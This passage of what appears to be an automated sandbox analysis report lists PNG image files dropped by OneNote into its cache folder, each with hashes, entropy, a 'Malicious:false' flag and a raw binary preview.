                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
